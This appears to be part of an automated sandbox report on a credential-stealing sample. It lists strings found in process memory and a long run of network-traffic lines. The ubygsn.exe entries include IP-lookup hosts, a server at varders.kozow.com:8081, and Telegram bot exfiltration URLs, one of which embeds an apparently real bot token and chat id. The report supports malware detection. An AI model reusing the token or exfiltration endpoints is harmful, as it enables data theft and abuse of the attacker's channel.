Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe.3.dr String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000008.00000002.2248564967.0000000007193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.miUY:m
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000008.00000002.2244050914.0000000005789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291901303.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2241224175.0000000004876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MSBuild.exe, 00000003.00000002.4593226321.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2241224175.0000000004721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2281406478.0000000004B81000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2241224175.0000000004876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe.3.dr String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4608317412.00000000040D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000008.00000002.2241224175.0000000004721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2281406478.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe.3.dr String found in binary or memory: https://api.telegram.org/bot
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20a
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4608317412.00000000040D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4608317412.00000000040D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4608317412.00000000040D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002F49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002F53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 0000000B.00000002.2291901303.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2291901303.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2291901303.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2244050914.0000000005789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291901303.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe.3.dr String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://system.data.sqlite.org/
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://system.data.sqlite.org/X
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see
Source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4608317412.00000000040D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ubygsn.exe, 0000000E.00000002.4608317412.0000000003DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002F89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
